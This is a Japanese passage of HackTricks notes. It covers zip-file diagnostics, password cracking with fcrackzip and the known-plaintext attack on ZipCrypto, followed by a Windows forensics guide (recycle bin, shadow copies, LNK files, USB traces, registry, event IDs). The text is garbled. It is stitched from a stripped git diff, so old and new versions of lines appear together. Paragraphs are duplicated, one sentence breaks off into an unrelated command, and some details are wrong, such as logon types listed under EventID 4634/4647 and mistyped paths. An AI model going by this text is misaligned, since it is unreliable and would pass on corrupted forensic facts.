zipファイルに関するいくつかのコマンドラインツールがあり、覚えておくと役立ちます。
**コマンドラインツール**を使用して**zipファイル**を管理することは、zipファイルの診断、修復、クラックに不可欠です。以下はいくつかの主要なユーティリティです
- `unzip`は、zipファイルが解凍されない理由について役立つ情報を出力することがよくあります。
- `zipdetails -v`は、形式のさまざまなフィールドに存在する値に関する詳細情報を提供します。
- `zipinfo`は、zipファイルの内容に関する情報をリストアップし、それを展開することなく表示します。
- `zip -F input.zip --out output.zip`および`zip -FF input.zip --out output.zip`は、破損したzipファイルを修復しようとします。
- [fcrackzip](https://github.com/hyc/fcrackzip)は、zipのパスワードをブルートフォースで推測しますパスワードが7文字未満の場合など
- **`unzip`**zipファイルが展開されない理由を明らかにします。
- **`zipdetails -v`**zipファイル形式のフィールドの詳細な分析を提供します。
- **`zipinfo`**zipファイルの内容を抽出せずにリストします。
- **`zip -F input.zip --out output.zip`**および**`zip -FF input.zip --out output.zip`**破損したzipファイルを修復しようとします。
- **[fcrackzip](https://github.com/hyc/fcrackzip)**zipパスワードの総当たりクラックのためのツールで、約7文字までのパスワードに効果的です
[Zipファイル形式の仕様](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
[Zipファイル形式の仕様](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)は、zipファイルの構造と標準に関する包括的な詳細を提供しています。
パスワードで保護されたzipファイルに関する重要なセキュリティ関連の注意点は、それらが含む圧縮ファイルのファイル名と元のファイルサイズを暗号化しないことです。これは、パスワードで保護されたRARや7zファイルとは異なります。
重要なのは、パスワードで保護されたzipファイルは、ファイル名やファイルサイズを**暗号化しない**ことです。これは、RARや7zファイルとは異なり、この情報を暗号化するものではありません。さらに、古いZipCryptoメソッドで暗号化されたzipファイルは、圧縮されたファイルの非暗号化コピーが利用可能な場合、**平文攻撃**に対して脆弱です。この攻撃は、既知のコンテンツを利用してzipのパスワードをクラックするためのもので、[HackThisの記事](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)で詳細に説明され、[この学術論文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)でさらに説明されています。ただし、**AES-256**暗号で保護されたzipファイルは、この平文攻撃に対して免疫を持っており、機密データに対して安全な暗号化方法を選択する重要性を示しています。
zipのクラックに関する別の注意点は、暗号化されたzipに圧縮されているファイルのうち1つでも暗号化されていない/非圧縮のコピーがある場合、"平文攻撃"を実行してzipをクラックできることです。詳細は[こちら](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)に記載されており、[この論文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)で説明されています。AES-256を使用してzipファイルをパスワードで保護する新しいスキーム"ZipCrypto"ではなく)には、この弱点がありません。
From: [https://app.gitbook.com/@cpol/s/hacktricks/\~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/o/Iwnw24TnSs9D9I2OtTKX/s/-L\_2uGJGU7AVNRcqRvEi/)
# 参考文献
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)

338
forensics/basic-forensic-methodology/windows-forensics/README.md
View file

@ -9,10 +9,10 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスッグ**](https://peass.creator-spring.com)を入手する
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリにPRを提出する。**
</details>
@ -28,26 +28,25 @@ HackTricksをサポートする他の方法
タイムラインは、訪れたWebページ、編集されたドキュメント、実行されたアプリケーションの**時間順の履歴**を提供するWindowsの特性です。
データベースは、パス`\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`にあります。このデータベースは、SQLiteツールまたは[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)というツールで開くことができ、[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md)というツールで開くことができる**2つのファイルが生成されます**
データベースは、パス`\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`にあります。このデータベースは、SQLiteツールまたは[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)というツールで開くことができます。**これにより、2つのファイルが生成され、[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md)で開くことができます**
### ADS代替データストリーム
ダウンロードされたファイルには、**ADS Zone.Identifier**が含まれており、それがイントラネット、インターネットなどから**どのように**ダウンロードされたかを示しています。一部のソフトウェア(ブラウザなど)は、通常、ファイルがダウンロードされた**URL**などの**さらなる情報**を追加します。
ダウンロードされたファイルには、**ADS Zone.Identifier**が含まれており、それがイントラネット、インターネットなどから**どのように**ダウンロードされたかを示しています。一部のソフトウェア(ブラウザなど)は、通常、ファイルがダウンロードされたURLなどの**さらに多くの情報**を追加します。
## **ファイルのバックアップ**
### リサイクルビン
Vista/Win7/Win8/Win10では、**リサイクルビン**はドライブのルートにあるフォルダ**`$Recycle.bin`**にあります(`C:\$Recycle.bin`)。
Vista/Win7/Win8/Win10では、**リサイクルビン**はドライブのルートにあるフォルダ**`$Recycle.bin`**にあります(`C:\$Recycle.bin`)。\
このフォルダでファイルが削除されると、2つの特定のファイルが作成されます
* `$I{id}`ファイル情報(削除された日付)
* `$R{id}`ファイルの内容
* `$I{id}`: ファイル情報(削除された日付)
* `$R{id}`: ファイルの内容
![](<../../../.gitbook/assets/image (486).png>)
これらのファイルを使用して、ツール[**Rifiuti**](https://github.com/abelcheung/rifiuti2)を使用して、削除されたファイルの元のアドレスと削除された日付を取得できますVista Win10用に`rifiuti-vista.exe`を使用してください)。
これらのファイルを使用して、ツール[**Rifiuti**](https://github.com/abelcheung/rifiuti2)を使用して、削除されたファイルの元のアドレスと削除された日付を取得できますVista Win10用に`rifiuti-vista.exe`を使用します)。
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
@ -55,25 +54,25 @@ Vista/Win7/Win8/Win10では、**リサイクルビン**はドライブのルー
### ボリュームシャドウコピー
Shadow Copyは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これは、それらが使用中であっても可能です。
Shadow Copyは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これは、使用中であっても可能です。
これらのバックアップは通常、ファイルシステムのルートにある`\System Volume Information`にあり、名前は以下の画像に示されている**UID**で構成されています:
これらのバックアップは通常、ファイルシステムのルートにある`\System Volume Information`にあり、名前は以下の画像に示**UID**で構成されています:
![](<../../../.gitbook/assets/image (520).png>)
**ArsenalImageMounter**を使用してフォレンジックイメージをマウントすると、ツール[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html)を使用してシャドウコピーを検査し、シャドウコピーのバックアップから**ファイルを抽出**することができます。
**ArsenalImageMounter**を使用してフォレンジックイメージをマウントすると、ツール[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html)を使用してシャドウコピーを検査し、シャドウコピーのバックアップからファイルを**抽出**することができます。
![](<../../../.gitbook/assets/image (521).png>)
レジストリエントリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`には、**バックアップしない**ファイルとキーが含まれています:
レジストリエントリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`には、バックアップしないファイルとキーが含まれています:
![](<../../../.gitbook/assets/image (522).png>)
レジストリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`には、`Volume Shadow Copies`に関する構成情報も含まれています。
### Office自動保存ファイル
### Office自動保存ファイル
Officeの自動保存ファイルは、`C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`にあります。
Officeの自動保存ファイルは、次の場所にあります: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
## シェルアイテム
@ -88,7 +87,7 @@ Windowsは、ユーザーがファイルを**開いたり使用したり作成
フォルダが作成されると、そのフォルダへのリンク、親フォルダへのリンク、祖父フォルダへのリンクも作成されます。
これら自動的に作成されたリンクファイルには、**ファイル**または**フォルダ**であるか、そのファイルの**MACタイム**、ファイルが保存されている場所の**ボリューム情報**、**ターゲットファイルのフォルダ**が含まれる情報があります。これらの情報は、削除された場合にこれらのファイルを回復するのに役立ちます。
これら自動的に作成されたリンクファイルには、**ファイル**か**フォルダ**か、そのファイルの**MACタイム**、ファイルが保存されている場所の**ボリューム情報**、**ターゲットファイルのフォルダ**が含まれる情報があります。これらの情報は、削除された場合にこれらのファイルを回復するのに役立ちます。
また、リンクファイルの**作成日**は、元のファイルが**最初に使用された時間**であり、リンクファイルの**変更日**は、元のファイルが**最後に使用された時間**です。
@ -133,17 +132,17 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
## Windows USBの使用
USBデバイスが使用されたことを特定することが可能です。これは次のようなものによって作成されます:
USBデバイスが使用されたことを特定することが可能です。これは次のようにして行われます:
- Windows最近使用したフォルダ
- Microsoft Office最近使用したフォルダ
- ジャンプリスト
* Windows最近使用したフォルダ
* Microsoft Office最近使用したフォルダ
* ジャンプリスト
一部のLNKファイルは、元のパスを指す代わりにWPDNSEフォルダを指します
一部のLNKファイルは、元のパスを指す代わりにWPDNSEフォルダを指します
![](<../../../.gitbook/assets/image (476).png>)
WPDNSEフォルダ内のファイルは、元のファイルのコピーであり、したがってPCの再起動を行うと消えます。GUIDはシェルバッグから取得されます。
フォルダWPDNSE内のファイルは、元のファイルのコピーであり、したがってPCの再起動を行うと消えます。GUIDはシェルバッグから取得されます。
### レジストリ情報
@ -153,13 +152,138 @@ USB接続されたデバイスに関する興味深い情報を含むレジス
USB接続が行われたタイムスタンプを取得するには、ファイル`C:\Windows\inf\setupapi.dev.log`を確認してください(`Section start`を検索)。
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### USB Detective
[**USBDetective**](https://usbdetective.com)を使用して、接続されたUSBデバイスに関する情報を取得できます。
[**USBDetective**](https://usbdetective.com)を使用して、イメージに接続されたUSBデバイスに関する情報を取得できます。
![](<../../../.gitbook/assets/image (483).png>)
### プラグアンドプレイのクリーンアップ
「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、古いドライバーバージョンを削除するために主に設計されています。最新のドライバーパッケージバージョンを保持することが明示されているにもかかわらず、オンラインソースによると、過去30日間非アクティブだったドライバーも対象となる可能性があります。その結果、過去30日間接続されていないリムーバブルデバイスのドライバーは削除の対象となる可能性があります。
このタスクは次の場所にあります:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`
タスクの内容を示すスクリーンショットが提供されています:
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
**タスクの主要なコンポーネントと設定:**
- **pnpclean.dll**: このDLLは実際のクリーンアッププロセスを担当しています。
- **UseUnifiedSchedulingEngine**: `TRUE`に設定されており、一般的なタスクスケジューリングエンジンが使用されていることを示しています。
- **MaintenanceSettings**:
- **Period ('P1M')**: タスクスケジューラに、定期的な自動メンテナンス中に月次のクリーンアップタスクを開始するよう指示します。
- **Deadline ('P2M')**: タスクスケジューラに、2か月連続でタスクが失敗した場合、緊急時の自動メンテナンス中にタスクを実行するよう指示します。
この構成により、ドライバーの定期的なメンテナンスとクリーンアップが確保され、連続した失敗の場合にタスクを再試行するための規定があります。
**詳細はこちらを参照:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
## メール
メールには**2つの興味深い部分が含まれます: ヘッダーとコンテンツ**です。**ヘッダー**には次のような情報が含まれます:
* メールを送信した**誰**メールアドレス、IP、メールをリダイレクトしたメールサーバー
* メールがいつ送信されたか
また、`References`と`In-Reply-To`ヘッダー内には、メッセージのIDが含まれています
![](<../../../.gitbook/assets/image (484).png>)
### Windowsメールアプリ
このアプリケーションは、メールをHTMLまたはテキストで保存します。メールは`\Users\<username>\AppData\Local\Comms\Unistore\data\3\`内のサブフォルダ内に保存され、`.dat`拡張子で保存されます。
メールの**メタデータ**と**連絡先**は、**EDBデータベース**内で見つけることができます:`\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
ファイルの拡張子を`.vol`から`.edb`に変更し、[ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html)ツールを使用して開くことができます。`Message`テーブル内でメールを確認できます。
### Microsoft Outlook
ExchangeサーバーやOutlookクライアントが使用されている場合、いくつかのMAPIヘッダーが存在します
* `Mapi-Client-Submit-Time`: メールが送信されたシステムの時間
* `Mapi-Conversation-Index`: スレッドの子メッセージ数とスレッドの各メッセージのタイムスタンプ
* `Mapi-Entry-ID`: メッセージ識別子
* `Mappi-Message-Flags`および`Pr_last_Verb-Executed`: MAPIクライアントに関する情報メッセージが読まれたか、未読か、返信済みか、リダイレクトされたか、オフィスを外出中かなど
Microsoft Outlookクライアントでは、送信/受信したメッセージ、連絡先データ、カレンダーデータが次の場所に保存されます:
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`WinXP
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
レジストリパス`HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook`は使用されているファイルを示します。
PSTファイルを開くには、[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)ツールを使用できます。
![](<../../../.gitbook/assets/image (485).png>)
### Microsoft Outlook OSTファイル
Microsoft Outlookが**IMAP**または**Exchange**サーバーと構成されている場合、**OSTファイル**が生成され、PSTファイルと同様の情報が保存されます。このファイルはサーバーと同期され、**過去12か月間**のデータを最大**50GB**まで保持し、PSTファイルと同じディレクトリに保存されます。OSTファイルを表示するには、[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)を利用できます。
### 添付ファイルの取得
失われた添付ファイルは次の場所から回復できる場合があります:
- **IE10**の場合:`%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- **IE11以降**の場合:`%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
### Thunderbird MBOXファイル
**Thunderbird**はデータを保存するために**MBOXファイル**を使用し、`\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`に保存されます。
### 画像サムネイル
- **Windows XPおよび8-8.1**:サムネイルが表示されるフォルダにアクセスすると、削除後も画像プレビューを保存する`thumbs.db`ファイルが生成されます。
- **Windows 7/10**UNCパスを介してネットワーク経由でアクセスすると、`thumbs.db`が作成されます。
- **Windows Vista以降**:サムネイルプレビューは`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`に集約され、**thumbcache\_xxx.db**という名前のファイルに保存されます。これらのファイルを表示するためのツールとして、[**Thumbsviewer**](https://thumbsviewer.github.io)と[**ThumbCache Viewer**](https://thumbcacheviewer.github.io)があります。
### Windowsレジストリ情報
Windowsレジストリは、広範なシステムおよびユーザーのアクティビティデータを保存しており、次の場所にファイルが保存されています
- `HKEY_LOCAL_MACHINE`のさまざまなサブキーに対しては`%windir%\System32\Config`
- `HKEY_CURRENT_USER`に対しては`%UserProfile%{User}\NTUSER.DAT`
- Windows Vista以降では、`HKEY_LOCAL_MACHINE`レジストリファイルは`%Windir%\System32\Config\RegBack\`にバックアップされます。
- さらに、プログラムの実行情報は、Windows VistaおよびWindows 2008 Server以降では`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`に保存されます。
### ツール
いくつかのツールがレジストリファイルを分析するのに役立ちます:
* **レジストリエディタ**: Windowsにインストールされています。現在のセッションのWindowsレジストリをナビゲートするためのGUIです。
* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): レジストリファイルをロードし、GUIでナビゲートすることができます。興味深い情報を含むキーをハイライトするブックマークが含まれています。
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): ロードされたレジストリをナビゲートするためのGUIがあり、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): ロードされたレジストリから重要な情報を抽出できる別のGUIアプリケーションです。
### 削除された要素の回復
キーが削除されると、そのようにマークされますが、そのスペースが必要になるまで削除されません。そのため、**Registry Explorer**などのツールを使用すると、これらの削除されたキーを回復することが可能です。
### 最終書き込み時刻
各キー値には、最後に変更された時刻を示す**タイムスタンプ**が含まれています。
### SAM
ファイル/ハイブ**SAM**には、システムの**ユーザー、グループ、ユーザーパスワード**のハッシュが含まれています。
`SAM\Domains\Account\Users`では、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、アカウント作成日時を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も必要です。
### Windowsレジストリの興味深いエントリ
{% content-ref url="interesting-windows-registry-keys.md" %}
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
{% endcontent-ref %}
## 実行されたプログラム
### 基本的なWindowsプロセス
[この記事](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d)では、疑わしい動作を検出するための一般的なWindowsプロセスに
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
@ -167,7 +291,7 @@ USB接続が行われたタイムスタンプを取得するには、ファイ
### Superprefetch
**Superprefetch**は、prefetchと同じ目標を持ち、**次に読み込まれるものを予測して**プログラムを高速に読み込むことを目指しています。ただし、prefetchサービスを置き換えるものではありません。\
**Superprefetch**は、prefetchと同じ目標を持ち、**次に読み込まれるものを予測して**プログラムを**高速に読み込む**ことです。ただし、prefetchサービスを置き換えるものではありません。\
このサービスは、`C:\Windows\Prefetch\Ag*.db`にデータベースファイルを生成します。
これらのデータベースには、**プログラムの名前**、**実行回数**、**開かれたファイル**、**アクセスされたボリューム**、**完全なパス**、**時間枠**、**タイムスタンプ**が含まれています。
@ -196,45 +320,40 @@ USB接続が行われたタイムスタンプを取得するには、ファイ
```
### AppCompatCache (ShimCache)
**Shimcache**, also known as **AppCompatCache**, is a component of the **Application Compatibility Database**, which was created by **Microsoft** and used by the operating system to identify application compatibility issues.
**AppCompatCache**、または**ShimCache**としても知られるものは、**Microsoft**が開発した**Application Compatibility Database**の一部であり、アプリケーションの互換性の問題に対処するためのものです。このシステムコンポーネントは、次のファイルメタデータを記録します:
The cache stores various file metadata depending on the operating system, such as:
- ファイルの完全なパス
- ファイルのサイズ
- **$Standard\_Information**SIの下の最終更新時刻
- ShimCacheの最終更新時刻
- プロセス実行フラグ
* File Full Path
* File Size
* **$Standard\_Information** (SI) Last Modified time
* ShimCache Last Updated time
* Process Execution Flag
このようなデータは、オペレーティングシステムのバージョンに基づいてレジストリ内の特定の場所に保存されます:
This information can be found in the registry in:
- XPの場合、データは`SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache`に保存され、96エントリを格納できます。
- Server 2003、およびWindowsバージョン2008、2012、2016、7、8、および10の場合、ストレージパスは`SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`で、それぞれ512および1024エントリを収容します。
* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache`
* XP (96 entries)
* `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`
* Server 2003 (512 entries)
* 2008/2012/2016 Win7/Win8/Win10 (1024 entries)
You can use the tool [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser) to parse this information.
保存された情報を解析するには、[**AppCompatCacheParser**ツール](https://github.com/EricZimmerman/AppCompatCacheParser)の使用をお勧めします。
![](<../../../.gitbook/assets/image (488).png>)
### Amcache
The **Amcache.hve** file is a registry file that stores the information of executed applications. It's located in `C:\Windows\AppCompat\Programas\Amcache.hve`
**Amcache.hve**ファイルは、システムで実行されたアプリケーションの詳細を記録するレジストリハイブです。通常、`C:\Windows\AppCompat\Programas\Amcache.hve`にあります。
**Amcache.hve** records the recent processes that were run and list the path of the files that are executed which can then be used to find the executed program. It also records the SHA1 of the program.
このファイルは、実行されたプロセスの記録、実行可能ファイルへのパス、およびそれらのSHA1ハッシュを保存するために注目されています。この情報は、システム上のアプリケーションの活動を追跡するために貴重です。
You can parse this information with the tool [**Amcacheparser**](https://github.com/EricZimmerman/AmcacheParser)
**Amcache.hve**からデータを抽出して分析するには、[**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser)ツールを使用できます。次のコマンドは、**Amcache.hve**ファイルの内容を解析し、結果をCSV形式で出力するための使用例です:
```bash
AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student\Desktop\srum
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
最も興味深い生成されたCSVファイルは、`Amcache_Unassociated file entries`です。
### 最も興味深いCSVファイルは、`Amcache_Unassociated file entries`です。
### RecentFileCache
このアーティファクトは、`C:\Windows\AppCompat\Programs\RecentFileCache.bcf`内のW7でのみ見つけることができ、いくつかのバイナリの最近の実行に関する情報を含んでいます。
このアーティファクトは、W7にのみ`C:\Windows\AppCompat\Programs\RecentFileCache.bcf`にあり、一部のバイナリの最近の実行に関する情報を含んでいます。
ファイルを解析するために、[**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser)ツールを使用できます。
ファイルを解析するに、[**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser)ツールを使用できます。
### スケジュールされたタスク
@ -242,21 +361,21 @@ AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student
### サービス
これらは`SYSTEM\ControlSet001\Services`のレジストリ内に見つけることができます。実行される内容と実行されるタイミングを確認できます。
これらは`SYSTEM\ControlSet001\Services`のレジストリ内にあります。実行される内容と実行されるタイミングを確認できます。
### **Windowsストア**
インストールされたアプリケーションは`\ProgramData\Microsoft\Windows\AppRepository\`内に見つけることができます。\
このリポジトリには、データベース内の**`StateRepository-Machine.srd`**という名前の**各アプリケーションのインストール**に関する**ログ**が含まれています。
インストールされたアプリケーションは`\ProgramData\Microsoft\Windows\AppRepository\`にあります。\
このリポジトリには、データベース内の**`StateRepository-Machine.srd`**という名前の**各インストールされたアプリケーション**に関する**ログ**があります。
このデータベースのApplicationテーブル内には、"Application ID"、"PackageNumber"、"Display Name"という列があります。これらの列には、プリインストールされたアプリケーションとインストールされたアプリケーションに関する情報が含まれており、インストールされたアプリケーションのIDは連続しているはずです。
このデータベースのApplicationテーブル内には、"Application ID"、"PackageNumber"、"Display Name"という列があります。これらの列には、プリインストールされたアプリケーションとインストールされたアプリケーションに関する情報が含まれており、インストールされたアプリケーションのIDが連続しているかどうかを確認できます。
また、レジストリパス内に**インストールされたアプリケーション**を見つけることも可能です:`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
そして**アンインストールされたアプリケーション**はこちらにあります:`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
また、レジストリパス`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`内に**インストールされたアプリケーション**を見つけることができます。\
そして**アンインストールされたアプリケーション**は`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`にあります。
## Windowsイベント
Windowsイベント内に表示される情報は以下の通りです:
Windowsイベントに表示される情報は次のとおりです:
* 何が起こったか
* タイムスタンプUTC + 0
@ -268,80 +387,91 @@ Windowsイベント内に表示される情報は以下の通りです
イベントファイルの場所は、SYSTEMレジストリ内の**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**にあります。
Windowsイベントビューアー**`eventvwr.msc`**)や[**Event Log Explorer**](https://eventlogxp.com) **や** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**などの他のツールで**これらを視覚化できます。**
Windowsイベントビューアー**`eventvwr.msc`**)や[**Event Log Explorer**](https://eventlogxp.com)や[**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)などの他のツールで表示できます。
### セキュリティ
## Windowsセキュリティイベントの理解
これはアクセスイベントを登録し、セキュリティ構成に関する情報を提供します。これは`C:\Windows\System32\winevt\Security.evtx`に見つけることができます。
セキュリティ構成ファイルに記録されるアクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあります。このファイルのサイズは調整可能であり、容量が達すると古いイベントが上書きされます。記録されるイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダ、共有アセットへのアクセスが含まれます。
イベントファイルの**最大サイズ**は設定可能であり、最大サイズに達すると古いイベントを上書きし始めます。
### ユーザー認証のための主要なイベントID
登録されるイベントには以下があります:
- **EventID 4624**: ユーザーが正常に認証されたことを示します。
- **EventID 4625**: 認証の失敗を示します。
- **EventIDs 4634/4647**: ユーザーログオフイベントを表します。
- **EventID 4672**: 管理特権でのログインを示します。
* ログイン/ログオフ
* ユーザーのアクション
* ファイル、フォルダ、共有アセットへのアクセス
* セキュリティ構成の変更
#### EventID 4634/4647内のサブタイプ
ユーザー認証に関連するイベント:
- **Interactive (2)**: 直接ユーザーログイン。
- **Network (3)**: 共有フォルダへのアクセス。
- **Batch (4)**: バッチプロセスの実行。
- **Service (5)**: サービスの起動。
- **Proxy (6)**: プロキシ認証。
- **Unlock (7)**: パスワードで画面のロック解除。
- **Network Cleartext (8)**: 明示的なパスワード送信、主にIISから。
- **New Credentials (9)**: アクセスのための異なる資格情報の使用。
- **Remote Interactive (10)**: リモートデスクトップまたはターミナルサービスへのログイン。
- **Cache Interactive (11)**: ドメインコントローラーに連絡せずにキャッシュされた資格情報でのログイン。
- **Cache Remote Interactive (12)**: キャッシュされた資格情報でのリモートログイン。
- **Cached Unlock (13)**: キャッシュされた資格情報でのロック解除。
| EventID | Description |
| --------- | ---------------------------- |
| 4624 | 認証成功 |
| 4625 | 認証エラー |
| 4634/4647 | ログオフ |
| 4672 | 管理者権限でのログイン |
#### EventID 4625のステータスおよびサブステータスコード
EventID 4634/4647には興味深いサブタイプがあります
- **0xC0000064**: ユーザー名が存在しない - ユーザー名の列挙攻撃を示す可能性があります。
- **0xC000006A**: 正しいユーザー名が間違ったパスワード - パスワードの推測または総当たり攻撃の試行が考えられます。
- **0xC0000234**: ユーザーアカウントがロックアウトされている - 多数の失敗したログインをもたらす総当たり攻撃の結果として発生する可能性があります。
- **0xC0000072**: アカウントが無効になっている - 無効になったアカウントへの不正アクセス試行。
- **0xC000006F**: 許可された時間外のログオン - 設定されたログイン時間外にアクセスを試みることは、不正アクセスの可能性を示すかもしれません。
- **0xC0000070**: ワークステーションの制限の違反 - 許可されていない場所からのログイン試行。
- **0xC0000193**: アカウントの有効期限切れ - 期限切れのユーザーアカウントでのアクセス試行。
- **0xC0000071**: パスワードの有効期限切れ - 期限切れのパスワードでのログイン試行。
- **0xC0000133**: 時間同期の問題 - クライアントとサーバー間の大きな時間のずれは、パスザチケットなどの高度な攻撃の兆候となる可能性があります。
- **0xC0000224**: 強制的なパスワード変更が必要 - 頻繁な強制的な変更は、アカウントセキュリティを不安定にする試みを示す可能性があります。
- **0xC0000225**: セキュリティ問題ではなく、システムのバグを示します。
- **0xC000015b**: 拒否されたログオンタイプ - ユーザーがサービスログオンを実行しようとするなど、許可されていないログオンタイプでのアクセス試行。
* **2 (interactive)**: キーボードやVNC、`PSexec -U-`などのソフトウェアを使用して対話的にログインされた
* **3 (network)**: 共有フォルダへの接続
* **4 (Batch)**: 実行されたプロセス
* **5 (service)**: サービスがサービス制御マネージャによって開始された
* **6 (proxy):** プロキシログイン
* **7 (Unlock)**: パスワードを使用して画面のロックを解除
* **8 (network cleartext)**: ユーザーがクリアテキストパスワードを送信して認証された。このイベントは以前はIISから来ていました
* **9 (new credentials)**: `RunAs`コマンドが使用された場合や、ユーザーが異なる資格情報でネットワークサービスにアクセスした場合に生成されます。
* **10 (remote interactive)**: ターミナルサービスやRDPを介した認証
